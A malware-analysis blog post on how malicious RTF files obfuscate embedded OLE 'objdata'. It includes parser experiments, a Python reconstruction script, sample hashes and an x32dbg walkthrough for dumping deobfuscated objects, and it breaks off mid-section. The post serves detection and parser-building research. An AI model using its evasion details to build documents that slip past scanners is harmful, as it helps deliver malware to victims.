Malware Analysis: The Final Frontier<p align="center">"Knowledge is power. Knowledge shared is power multiplied." - Robert Noyce</p>
Author: Denis O'Brien
Post: Deobfuscation tips: RTF files (published 2018-11-19T19:39:00.000+00:00, updated 2018-11-19T19:42:04.747+00:00)
<style>
* {
font-family: 'Exo 2', sans-serif;
}
h4, h5, h6 {
color: rgb(11, 83, 148);
font-family: 'Roboto Slab', serif;
}
ul {
list-style: none;
}
.consumer {
color:lime;
font-weight:700;
}
.auto-width {
width: auto;
height: 400px;
margin: auto;
}
</style>
<script>
function controlWordSearch() {
var input, filter, table, tr, th, i;
input = document.getElementById("controlWordInput");
filter = input.value.toUpperCase().split('').filter(character => /[A-Za-z]/.test(character)).join('');
table = document.getElementById("controlWordTable");
tr = table.getElementsByTagName("tr");
if (/[A-Za-z]/.test(filter)) {
for (i = 0; i < tr.length; i++) {
th = tr[i].getElementsByTagName("th")[0];
if (th) {
if (th.innerHTML.toUpperCase().indexOf(filter) > -1) {
tr[i].style.display = "";
} else {
tr[i].style.display = "none";
}
}
}
}
else if (filter.length === 0) {
for (i = 0; i < tr.length; i++) {
th = tr[i].getElementsByTagName("th")[0];
if (th) {
tr[i].style.display = "";
}
}
}
else {
document.getElementById("controlWordInput").value = "";
}
}
function animationToggle(animationID) {
var animation, parentButton;
animation = document.getElementById(animationID);
parentButton = document.getElementById(`${animationID}Button`);
if (animation.style.display === "none") {
animation.style.display = "";
parentButton.innerText = "Hide";
}
else {
animation.style.display = "none";
parentButton.innerText = "Show";
}
}
</script>
<div class="container">
<div class="container" id="intro">
<div>
<h4>Introduction</h4>
</div>
<div>
This blog post outlines the findings I came across when analysing different types of data obfuscation found
in malicious RTF files. The research included performing static and dynamic analysis of publicly available
samples used for delivering commodity malware. The main goal was to understand how the native RTF parser
treats unexpected data in control word groups, such as 'objdata'.
</div>
</div>
<hr>
<div class="container" id="executive">
<div>
<h4>Executive Summary</h4>
</div>
<div>
Information in this blog post is intended for cybersecurity researchers and specialists developing RTF file
parsers. The research is based on work already performed by other cybersecurity researchers and firms.
Its goal is to add some context to their work so that readers less familiar with this area can better
understand it.
</div>
<br>
<div>
As a part of this research, over 2000 experiments were performed. Each experiment aimed at establishing the behavior of Microsoft's
native RTF parser when processing unexpected data. Knowing this behavior allows for reconstruction of data
that is otherwise obfuscated for the purpose of hiding the malicious content and impeding static, signature-based
detection.
</div>
</div>
<hr>
<div class="container" id="analysis">
<div>
<h4>Analysis</h4>
</div>
<div style="font-size: 0.75rem">
<b>Disclaimer</b>: The results observed might be specific to the test environment used. The same results can be
achieved using other open- or closed-source tools.
</div>
<br>
<div id="analysisObfuscation">
<h5>Obfuscation / Obfuscation Types</h5>
</div>
<div>
RTF files allow for a broad range of data obfuscation techniques. The FireEye Threat Research group and Kaspersky
Lab explained the most common techniques in their blog posts <a href="https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html">here</a>
and <a href="https://securelist.com/disappearing-bytes/84017/">here</a>.
While almost all of the techniques highlighted in those reports are still being used by threat actors, there
have been a few additions in the last 2.5 years. See the carousel below for some of the most common obfuscation types:
</div>
<br>
<div class="row justify-content-center">
<div class="col-10">
<div id="obfuscationTypesCarousel" class="carousel slide" data-ride="carousel">
<div class="carousel-inner">
<div class="carousel-item active">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX8gMnD8BRQVQEduhfHyeYq9p36eYc-L8O76GrD6H0fBHGegbzuOr9Dentfec4qZcrxg1_zW8jbywNbDpFm_X2zaG-EMDNU7NKjb2x4kzGEGxQG6Lb-XMhB59lnq16KiMuh8ClNx_0u6AS/s1600/Screenshot+from+2018-11-03+15-41-33_small.png"
alt="First slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2nekktg0o0AyoiXW5kr7LJkaGnEieMZYW3Z2Uwqo83_2mDkQ4vFIHoe9TtfVSJw4ZAjJ6R0BSS-PAYvOMX6C3bw7844nCsEIvDUAq6h51YGPPzADSgjAbyJaBrFxS6Iyh5VeblrQVsOKK/s1600/Screenshot+from+2018-11-03+15-46-21_small.png"
alt="Second slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRHqOWY-PoIDsreDNyZ3CFj3DHE03XD4tF0iOafomtERF5_PQy3lrdXdU-YPMVAwknEkBVQzT-y3Xj72jFe5HMYWioFcZfg_zRG1SJRgk8EUHcIXeT-ObEXT-0UnfsNXgRE0ibtcwICLF4/s1600/Screenshot+from+2018-11-03+15-48-08_small.png"
alt="Third slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPsYKhQFlxfvDf-jo5UdofaqmXUfclNncEEFNVOcrINtA_n0B_1Nw560ByhzMeU6PMofztCZNPhwasnFOtWVFKo-5vnu7lhpCaANUsN8YMgOtC0S4kDoe73ufd_ba2RGZF7RhZRgeC_lS9/s1600/Screenshot+from+2018-11-03+15-51-42_small.png"
alt="Fourth slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRc0Jk0K8CFZLW4rb8R6c6KXqCGQSibvqb34SX2faegJbLn1Bx4du0R_kcxUv4dlCGDLPcqC9NkzoIN_eYj5hc_Y1ZFs-3emcYYBumYg18EIEa8d3yX8pygaVe5fOydoqC9pD23xf_icLq/s1600/Screenshot+from+2018-11-03+16-15-39_small.png"
alt="Fifth slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhYVkSbmjPY-hLXZqaKb9NtGcDXoemrntVRKt6IhUAvFH6wTA9zb8n3XKq84nJaZMnLNXvYSi8IwyeuaPBeH3netRK_M3ukIlfUxHVEG9yeiMvSWRZbePPMwQMb2Mp82IXKehRQTdqMe5D/s1600/Screenshot+from+2018-11-03+16-19-37_small.png"
alt="Sixth slide">
</div>
<div class="carousel-item">
<img class="d-block auto-width" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDDm9JnRAcEQ8uk4Zbac5wFXcSyEoiVx-mJbXGmPBCDZvh_LY6bNgO9vppt9bNns7MLIWuJn5WRbrvV8B23VjGv8qsrsiELjXObd5dzjrrHnaK14UxBgvySEJ2S_hSPdR_QTYFSYJJ9L8Z/s1600/Screenshot+from+2018-11-03+16-20-18_small.png"
alt="Seventh slide">
</div>
</div>
<a class="carousel-control-prev" href="#obfuscationTypesCarousel" role="button" data-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="carousel-control-next" href="#obfuscationTypesCarousel" role="button" data-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
</div>
</div>
</div>
<br>
<div>
The techniques shown above can be found in the following malware samples:
<div class="row">
<div class="col-6">
<ul class="list-group list-group-flush">
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/f31fb0969f07cb8a228165b212d1ca04527badbcff5503f8e60497d995e606e4/detection">37073b8fa1b9ab1863d47de89f3d3bd5</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/cc42a36b5b17c94d40cb59f792c6e7100cf771cccb296b4057f1e442d34f8de3/detection">35cbfbc04fac3e2f5c5699fd16c898f6</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/946e3acbb3c1849e86dd057cf07407d3ca4cf3f73fb7428ff51ca4e4ecb07f74/detection">bb006ed910b9dacfc8bb807873e82a5e</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/5da8e9c7642038d788123335f3531dd9d146d9ecf91450843c8ca229af5a0a3b/detection">8efab288196e466bf6b9a5dc4761e499</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/8e289a91a13c7d4c8f4f8ef5586dc3f0012ed71fd73d5d3240ecd5ed4e3d6ca9/detection">ade12ff6ac7541c5a55de89fbb57cec9</a></li>
<li class="list-group-item"><a href="https://www.virustotal.com/#/file/3a5de235ecb2c686c245277faf75b2393a23369d466880a67545bd3b29a1534c/detection">04399af30c10b3899dedbbc16b689c56</a></li>
</ul>
</div>
</div>
</div>
<br>
<div>
Such a variety of obfuscation techniques makes it difficult to perform static analysis of files generated
using them. To reconstruct obfuscated objects manually, one needs to know how the RTF reader's
'state machine' (<a href="https://www.microsoft.com/en-ie/download/details.aspx?id=10725">Rich
Text Format (RTF) Specification, Version 1.9.1 (page 212)</a>) will interpret the data it reads.
</div>
<br>
<div>
The trickiest part is the destination control word '\*'. According to the RTF Specification
document, it serves the following purpose: '<b>Marks a destination whose text should be ignored if not
understood by the RTF reader.</b>' It would be great if it were just that, but its behavior
is a bit trickier due to the way it affects the RTF reader's internal state. Here is another comment on this
control
word from the specification document, advising on things to consider when building an RTF parser.
</div>
<br>
<div>
<blockquote class="blockquote">
<p class="mb-0">Always understand \*</p>
<p class="mb-0">One of the most important things an RTF reader can do is to understand the \* control. This
control introduces a destination that <span style="color: red; font-weight: 700">is not part of the document</span>.
It tells the RTF reader that <span style="color: red; font-weight: 700">if the reader does not understand</span>
the next control word, then <span style="color: red; font-weight: 700">it should skip the
entire enclosing group</span>.</p>
</blockquote>
</div>
<div>
Somewhat straightforward, but what happens when the RTF reader DOES understand the control word? How is the RTF
reader's state going to be affected by the data contained in the destination group?
</div>
<br>
<div>
This blog post will attempt to shed some light on this very subject. The goal of my research was to establish the
behavior of Microsoft's native RTF parser when it encounters 'extra' groups or control words inside 'objdata'
groups. Having done some OSINT research, I came to understand that it is difficult to identify with 100%
certainty how a given piece of unexpected data will be processed. It all boils down to the RTF control words and their
ability to consume (or not) the data right after them.
</div>
<br>
<div>
According to the RTF specification document, there are 1814 control words. They are split into the following 5
groups:
</div>
<div>
<ul>
<li>Destinations</li>
<li>Flags</li>
<li>Symbols</li>
<li>Toggles</li>
<li>Values</li>
</ul>
</div>
<div>
The ones most commonly used in 'objdata' group obfuscation are destinations, symbols and flags. What adds
an extra bit of complexity is the '\*' control word. As will be shown later, a control word's data
consumption behavior differs depending on whether it is used inside a destination group or not.
</div>
<br>
<div>
The approach I've taken to identify the control words' behavior is quite simple. I took all the destination and
flag control words and generated simple RTF files with each of them placed inside a destination group and outside one. See below
for an example:
</div>
<br>
<div>
<div class="text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2ROLU4yCwAFoevLgGBx6GMUV4ehLYrTB0RClFLMFj2tdbQYgD-rmQUVUc3QJy9REfCJXwyccd7Wp6N-4BQB07NbqbU_61QXs75fcpuIpvEARCbhLHIT29mU7UkYsQHb1iRpq1MMXzqXm8/s1600/Screenshot+from+2018-11-11+15-57-06.png">
<img class="rounded" style="width: 40%; padding-right: 10px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2ROLU4yCwAFoevLgGBx6GMUV4ehLYrTB0RClFLMFj2tdbQYgD-rmQUVUc3QJy9REfCJXwyccd7Wp6N-4BQB07NbqbU_61QXs75fcpuIpvEARCbhLHIT29mU7UkYsQHb1iRpq1MMXzqXm8/s1600/Screenshot+from+2018-11-11+15-57-06.png" />
</a>
<span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpb0YjvLezk0uedVRE0Y4gQVpKY94I-ZR2OQ83n9Zt7n8BqIE6jCE2c2FAk0DMe-jmlCHDpgem5hof3ksJs3MyrQ5PTjjfPBCB41jcs2PQCrRMM3wprNfp0h3ZbfHsnqNRkaW2DNXCW3VA/s1600/Screenshot+from+2018-11-11+15-57-38.png">
<img class="rounded" style="width: 40%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpb0YjvLezk0uedVRE0Y4gQVpKY94I-ZR2OQ83n9Zt7n8BqIE6jCE2c2FAk0DMe-jmlCHDpgem5hof3ksJs3MyrQ5PTjjfPBCB41jcs2PQCrRMM3wprNfp0h3ZbfHsnqNRkaW2DNXCW3VA/s1600/Screenshot+from+2018-11-11+15-57-38.png" />
</a>
</span>
</div>
</div>
<br>
<div>
All in all, I ended up with 2358 RTF files. A fair question arises: how on Earth are you going to analyse 2358
files? On Earth, the answer is really simple - manually opening each one of them and witnessing the result with
your own eyes.
</div>
<br>
<div>
No matter how sad a person some people might think I am after opening 2358 RTF files with Microsoft Office
Word, I recorded the results and built a searchable table (see the Appendix section) to help me find a control word's
behavior depending on its group location. Click the 'Show' button below to see an example of a
search:
</div>
<br>
<div>
<button id="animation1Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation1')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation1" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHTVt1EuL0oOzF5txmbKoYTGak2BtUK8nPdoEFHAJKJv9I50j-Tu1G1kv0WGm6QS-umRa6SnRsgjSdYSqatd1KVOO-XHCzJd5YBCufSa-ZdIwW5X_ijNqBsKyILdFFHWtyYOzJiAxuL1PD/s1600/Peek+2018-11-11+16-56.gif">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHTVt1EuL0oOzF5txmbKoYTGak2BtUK8nPdoEFHAJKJv9I50j-Tu1G1kv0WGm6QS-umRa6SnRsgjSdYSqatd1KVOO-XHCzJd5YBCufSa-ZdIwW5X_ijNqBsKyILdFFHWtyYOzJiAxuL1PD/s1600/Peek+2018-11-11+16-56.gif" />
</a>
</div>
</div>
<br>
<div>
<span class="consumer">Consumes data </span> means that any data following the control word will be consumed by
it and will NOT be present in the final 'objdata' group data. Following the example of a control word
given above, see how it affects the 'objdata' group data below (left: inside a '\*' destination group, the data is consumed; right: outside one, the data is kept):
</div>
<br>
<div class="row" style="font-size: 0.7rem">
<div class="col-6 text-center">
<div>{\*\objdata 010500000200000008000000{<span style="color:red; font-weight: 700;">\*</span>\mmaxdist <span
style="color:red; font-weight: 700;">5061636b616765000</span>} 000000000}</div>
<div>⇓</div>
<div>{\*\objdata 010500000200000008000000000000000}</div>
</div>
<div class="col-6 text-center">
<div>{\*\objdata 010500000200000008000000{\mmaxdist <span style="color:red; font-weight: 700;">5061636b616765000</span>}
000000000}</div>
<div>⇓</div>
<div>{\*\objdata 010500000200000008000000<span style="color:red; font-weight: 700;">5061636b616765000</span>000000000}</div>
</div>
</div>
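<div>
The parser logic behind the two cases above, as an added example (this is not code from the post or from any of the tools it mentions): a minimal model of the reader's state machine that skips any group opened with <b>\*</b>, keeps the text of other groups, and also handles the <b>\'hh</b> escapes and the <b>\bin</b> control word discussed in the Aftermath section. The rule that every control word not preceded by '\*' is non-consuming is an assumption of this model; the real parser decides per control word, which is what the author's table records, so for a given word the real result may differ.
</div>

```python
r"""Simplified model of how Word's RTF reader assembles an 'objdata' payload.

Added example, not code from the post. It encodes the behaviour the post
observes, with one simplifying assumption flagged below:
  * a group opened with {\* is an ignorable destination: the reader skips
    the whole group, so everything inside it is "consumed";
  * a group without \* (e.g. {\mmaxdist ...}) does not consume the text
    after its control word, so that text survives into the payload;
  * \'hh is a character escape: it yields one text character, which is
    kept only if it is a hex digit; \binN inserts N raw bytes; bare hex
    digits are copied; whitespace, CR/LF and other characters are dropped.
ASSUMPTION: every control word not preceded by \* is treated as
non-consuming. The real parser decides per control word.
"""
import re

HEX_DIGITS = b"0123456789abcdefABCDEF"
# \word, optional numeric parameter, optional single space delimiter
CONTROL_WORD = re.compile(rb"\\([a-zA-Z]+)(-?\d+)? ?")


def objdata_hex(rtf: bytes) -> str:
    """Return the hex text that reaches the first \objdata group in `rtf`."""
    start = rtf.find(b"\\objdata")
    if start < 0:
        raise ValueError("no \\objdata group found")
    out = bytearray()          # hex characters of the reconstructed payload
    i = start + len(b"\\objdata")
    depth = 1                  # we are inside the objdata group
    skip_depth = None          # depth of the ignorable group being skipped
    while i < len(rtf) and depth > 0:
        c = rtf[i:i + 1]
        if c == b"{":
            depth += 1
            # "{\*" opens an ignorable destination: skip until it closes
            if skip_depth is None and rtf[i + 1:i + 3] == b"\\*":
                skip_depth = depth
            i += 1
        elif c == b"}":
            if skip_depth == depth:
                skip_depth = None
            depth -= 1
            i += 1
        elif c == b"\\":
            nxt = rtf[i + 1:i + 2]
            if nxt == b"'":
                # \'hh escape: one character of text, kept if it is a hex digit
                hh = rtf[i + 2:i + 4]
                i += 4
                if skip_depth is None and re.fullmatch(rb"[0-9a-fA-F]{2}", hh):
                    ch = bytes([int(hh, 16)])
                    if ch in HEX_DIGITS:
                        out += ch
            elif nxt == b"*":
                i += 2         # the \* marker itself carries no data
            else:
                m = CONTROL_WORD.match(rtf, i)
                if m is None:  # control symbol such as \{ or \\: no data
                    i += 2
                    continue
                i = m.end()
                if m.group(1) == b"bin" and m.group(2):
                    # \binN: the next N bytes are raw binary payload
                    n = int(m.group(2))
                    if skip_depth is None:
                        out += rtf[i:i + n].hex().encode("ascii")
                    i += n
        else:
            if skip_depth is None and c in HEX_DIGITS:
                out += c
            i += 1
    return out.decode("ascii")


def objdata_bytes(rtf: bytes) -> bytes:
    """Binary form of the payload; a dangling odd nibble is dropped."""
    h = objdata_hex(rtf)
    return bytes.fromhex(h[: len(h) - len(h) % 2])


if __name__ == "__main__":
    # The two cases shown in the post: \*\mmaxdist consumes, \mmaxdist does not
    consumed = rb"{\*\objdata 010500000200000008000000{\*\mmaxdist 5061636b616765000} 000000000}"
    kept = rb"{\*\objdata 010500000200000008000000{\mmaxdist 5061636b616765000} 000000000}"
    print(objdata_hex(consumed))
    print(objdata_hex(kept))
```

<div>
Running the script on the two inputs above reproduces the two results shown in the comparison: the '\*' variant yields the 24 leading hex digits followed directly by the trailing zeros, while the plain variant keeps the <b>5061636b616765000</b> run in between. A production tool would replace the single non-consuming assumption with the per-control-word results from the table.
</div>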
<br>
<div>
The table might come in handy when building RTF parsing tools or peeling off some simple obfuscation, but when
things become a bit more complicated we need a better approach. The section below describes a method that proved to
work with any obfuscation type.
</div>
<br>
<div id="analysisSilverBullet">
<h5>The Silver Bullet</h5>
</div>
<div style="font-size: 0.75rem">
<b><u>NOTE</u></b>: <span style="color:red">It is strongly recommended that the following procedures be
performed in an environment you can allow to be compromised.</span>
</div>
<br>
<div>
The FireEye report mentioned previously discusses a 'silver bullet' approach to
deobfuscating OLE objects embedded in RTF files. The gist of it is to intercept the call to the
'OleConvertOLESTREAMToIStorage' function. The interception allows extracting the reconstructed OLE
object before it is passed on for further processing. The object will be fully deobfuscated as per Microsoft's
native RTF parser logic.
</div>
<br>
<div>
The section below is a walk-through of this method using <a href="https://x64dbg.com/#start">x32dbg</a>.
Whether you are manually analysing an obfuscated RTF file or building automation tools, the procedure below
might prove helpful.
</div>
<br>
<div>
<h6>Test Environment</h6>
</div>
<div>
The following test environment was used:
</div>
<div>
<ul>
<li><b>Virtualization</b>: Virtual Box (5.2.10)</li>
<li><b>Guest OS</b>: Windows 7 Professional SP1</li>
<li><b>Host Application</b>: Microsoft Office 2007 (12.0.4518.1014)</li>
<li><b>Debugger</b>: x32dbg (build Aug 12 2018, 23:03:57)</li>
<li><b>Text Editor</b>: Notepad++ (v7.5.9 64-bit)</li>
</ul>
</div>
<div>
<h6>Pre-debugging Steps</h6>
</div>
<div>
Before opening a test RTF sample in Microsoft Word, the following steps must be completed:
</div>
<div>
<ol>
<li>start Microsoft Word application</li>
<li>start x32dbg application</li>
<li>in x32dbg, go <b>File</b> -> <b>Attach</b></li>
<li>in the 'Attach' window, select 'WINWORD'</li>
<li>click <b>Attach</b> button</li>
<li>press <b>F9</b> or click <b>Run</b> button in the top tool bar</li>
</ol>
</div>
<div>
Click 'Show' button below to see steps 3 - 6.
</div>
<br>
<div>
<button id="animation2Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation2')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation2" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_wip5lXOGZhhISR_1p7fpZLk5VB8oVPXSXdpqz8uuAEQvthkbZwaS3xnu_qSUtEIQOupKcRf4LE4D74fJAEwS3LbQ8k97veuovbtgis43ZCPPXl27JgcMMA_mfniFkvkuzfyAl_yQObGV/s1600/Peek+2018-11-11+13-24_edited.gif">
<img class="rounded" style="width: 800px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_wip5lXOGZhhISR_1p7fpZLk5VB8oVPXSXdpqz8uuAEQvthkbZwaS3xnu_qSUtEIQOupKcRf4LE4D74fJAEwS3LbQ8k97veuovbtgis43ZCPPXl27JgcMMA_mfniFkvkuzfyAl_yQObGV/s1600/Peek+2018-11-11+13-24_edited.gif" />
</a>
</div>
</div>
<br>
<div>
<h6>Debugging</h6>
</div>
<div style="font-size: 0.75rem">
<b><u>NOTE</u></b>: The following steps are based on this sample <a href="https://www.virustotal.com/#/file/5da8e9c7642038d788123335f3531dd9d146d9ecf91450843c8ca229af5a0a3b/detection">bcde46711f4b7c1b7cc0b2e490748472c04fdc74</a>
</div>
<br>
<div>
A fair amount of obfuscation techniques is used in this test sample. It would be rather challenging to reconstruct
the embedded OLE object manually. Before opening the sample with Microsoft Word, we need to set up a
breakpoint on the 'OleConvertOLESTREAMToIStorage' function call. The steps below describe one way of doing
it:
</div>
<br>
<div>
<ol>
<li>in x32dbg, go to <b>Symbols</b> tab</li>
<li>click anywhere in the left pane and start typing <b>ole32.dll</b></li>
<li>click anywhere in the right pane and start typing <b>OleConvertOLESTREAMToIStorage</b></li>
<li>once the view is filtered, find reference to <b>OleConvertOLESTREAMToIStorage</b> and click on it</li>
<li>press <b>F2</b> or right click on it and select <b>Toggle Breakpoint</b></li>
<li>switch to <b>Breakpoints</b> tab and make sure there is an entry for <b>OleConvertOLESTREAMToIStorage</b>
function call</li>
</ol>
</div>
<div>
Click 'Show' button below to see steps in action.
</div>
<br>
<div>
<button id="animation3Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation3')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation3" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHt9rVs2YBl_V-5cISy8MmMfW01SMbNvOmUFVvq0fmJ-AWIhEVEHV8-lerIJEjG4v9o5QdAFlvd4Ln86izppG6LwU-6TAPBGIKMqgu4ft81GcgKHGAHf4ISr2hZ0DvLYlFsOvPBZbMc-x8/s1600/Peek+2018-11-11+18-46.gif">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHt9rVs2YBl_V-5cISy8MmMfW01SMbNvOmUFVvq0fmJ-AWIhEVEHV8-lerIJEjG4v9o5QdAFlvd4Ln86izppG6LwU-6TAPBGIKMqgu4ft81GcgKHGAHf4ISr2hZ0DvLYlFsOvPBZbMc-x8/s1600/Peek+2018-11-11+18-46.gif" />
</a>
</div>
</div>
<br>
<div>
Now we're ready to open the test sample in Microsoft Word and intercept the call to the
'OleConvertOLESTREAMToIStorage' function. This allows us to extract the embedded OLE object
directly from memory after it has been assembled by Microsoft's native RTF parser. Follow the steps below:
</div>
<br>
<div>
<ol>
<li>in Microsoft Word, click on <b>Office Button</b> and select <b>Open</b></li>
<li>navigate to the location where the sample is stored</li>
<li>double-click on the file or select the file and click <b>Open</b> button</li>
<li>switch to x32dbg</li>
</ol>
</div>
<br>
<div>
At this stage we have loaded the test sample into Microsoft Word and stopped its execution at the
'OleConvertOLESTREAMToIStorage' function call. Our next step is finding the assembled OLE object
in memory. Follow the steps below:
</div>
<br>
<div>
<ol>
<li>in x32dbg, right-click on the second line from the top in the stack pane</li>
<li>select <b>Follow DWORD in Dump</b></li>
<li>select the DWORD value (4 bytes) in the third column of the first line in <b>Dump 1</b> tab</li>
<li>right-click the selected value and expand <b>Follow DWORD in Dump</b> menu</li>
<li>select <b>Dump 2</b> option</li>
<li>select the DWORD value (4 bytes) in the first column of the first line in <b>Dump 2</b> tab</li>
<li>right-click the selected value and click <b>Follow DWORD in Current Dump</b> option</li>
</ol>
</div>
<br>
<div>
The <b>Dump 2</b> tab now shows the embedded OLE object in memory after it has been parsed by the native RTF
parser. It is fully assembled and all the data obfuscation has been removed. Before we can extract the object
from memory, we need to note the memory address where it is located and its length.
</div>
<br>
<div>
The address is currently shown on the first line of the <b>Dump 2</b> tab. The length value is located next to
the value we selected first in the <b>Dump 1</b> tab. Switch to the 'Dump 1' tab and note the value
in the fourth column of the first line. Our next step is to carve the object out of memory and save it to disk.
Follow the steps below to do so:
</div>
<br>
<div>
<ol>
<li>click on <b>Command</b> text entry field (located at the bottom of x32dbg window)</li>
<li>type <b>savedata :memdump:, <i>mem_addr</i>, <i>length</i></b></li>
<li>press <b>Enter</b> key</li>
</ol>
</div>
<br>
<div>
The OLE object is now saved in <b><i>X64DBG_INSTALL_PATH</i>\release\x32\memdumps</b> folder.
</div>
<br>
<div>
Click the 'Show' button below to see all those steps in action.
</div>
<br>
<div>
<button id="animation4Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation4')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation4" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCWOup1tL7-XuFmJK1wTBQJw1l81h2T7otjKyv85-GImDwntco4fzOXp0SIGW2aplYRij406F1SHDzb8ryLaPYGmUrtb3OEJbu-_UwXan3yTbmuvUhIE7_z7yp-qcDs2znAEjx7RQ0_9yN/s1600/Peek+2018-11-11+20-20.gif">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCWOup1tL7-XuFmJK1wTBQJw1l81h2T7otjKyv85-GImDwntco4fzOXp0SIGW2aplYRij406F1SHDzb8ryLaPYGmUrtb3OEJbu-_UwXan3yTbmuvUhIE7_z7yp-qcDs2znAEjx7RQ0_9yN/s1600/Peek+2018-11-11+20-20.gif" />
</a>
</div>
</div>
<br>
<div>
If the RTF file contains multiple embedded OLE objects, pressing <b>F9</b> will continue Microsoft Word's execution
until the next OLE object is passed to the 'OleConvertOLESTREAMToIStorage' function. At this point though,
there is no guarantee your test machine will not be infected. Proceed with caution!
</div>
<br>
<div>
<h6>Aftermath</h6>
</div>
<div>
In this section we will review the results using some of the data obfuscation examples found in the original RTF
sample file. If you wish to follow along, open it in a text editor. I'll be using 'Notepad++' and
referencing pieces of data by their line positions in the file. You will also need a hex viewer/editor of your
choice.
</div>
<br>
<div>
First, let's describe the 'objdata' group that starts on line 67.
</div>
<br>
<div>
There are 2 groups that follow right after its declaration, on line 71. Each group contains 3 control words
followed by a piece of data.
</div>
<br>
<div>
<button id="animation5Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation5')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation5" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_fhJppJ4On0Osdls2lFdUiDddsyMXbwwbvm0oE_dEkYp1WZPTo8HlPzbJKTSFr1K6OsK1G4cwkWodRgApTCtlORq-QGbVoNy1PYnAhA_yUdAArgJkgPjoCET-hw6WNjAFHYsUEIRdQRZa/s1600/Screenshot+from+2018-11-12+22-29-25.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_fhJppJ4On0Osdls2lFdUiDddsyMXbwwbvm0oE_dEkYp1WZPTo8HlPzbJKTSFr1K6OsK1G4cwkWodRgApTCtlORq-QGbVoNy1PYnAhA_yUdAArgJkgPjoCET-hw6WNjAFHYsUEIRdQRZa/s1600/Screenshot+from+2018-11-12+22-29-25.png" />
</a>
</div>
</div>
<div>
A sequence of <b>\'</b> special characters begins on line 77. Their general purpose is to represent a hex
value, based on the specified character set, but as can be seen in the given examples, the 'hex'
characters do not conform to the hex value representation format.
</div>
<br>
<div>
<button id="animation6Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation6')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation6" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjF63NrNAV_8GRwaAg_1KiVCT4Go5SZDP71y7ZyVhJsMhcKSrplLJil4AwEaXmh-rZxdBnvmtifhQ0bLjRDDtSxaHgaXvXcjfvC8n26mrpwTKZlcKcdsa8CVBu-hkr9GE2NQSp2v4Bx5f/s1600/Screenshot+from+2018-11-12+22-35-09.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjF63NrNAV_8GRwaAg_1KiVCT4Go5SZDP71y7ZyVhJsMhcKSrplLJil4AwEaXmh-rZxdBnvmtifhQ0bLjRDDtSxaHgaXvXcjfvC8n26mrpwTKZlcKcdsa8CVBu-hkr9GE2NQSp2v4Bx5f/s1600/Screenshot+from+2018-11-12+22-35-09.png" />
</a>
</div>
</div>
<div>
Plain text data begins on line 80 and is followed by another special-character obfuscation starting on line 83.
</div>
<br>
<div>
<button id="animation7Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation7')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation7" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyo25X0ZvVuai8-rb5gVj-RsMdePwjRnnEUw4_Qgh9ELitIn6BHdK6IKfkTjhStwzUrQ357_SxpIYc1gpG1UZVl09QJh-jOknNolWSdfEB48pokbNGUK7wSuKAXUQzI6mLwPe5iZnpoIV_/s1600/Screenshot+from+2018-11-12+22-39-06.png">
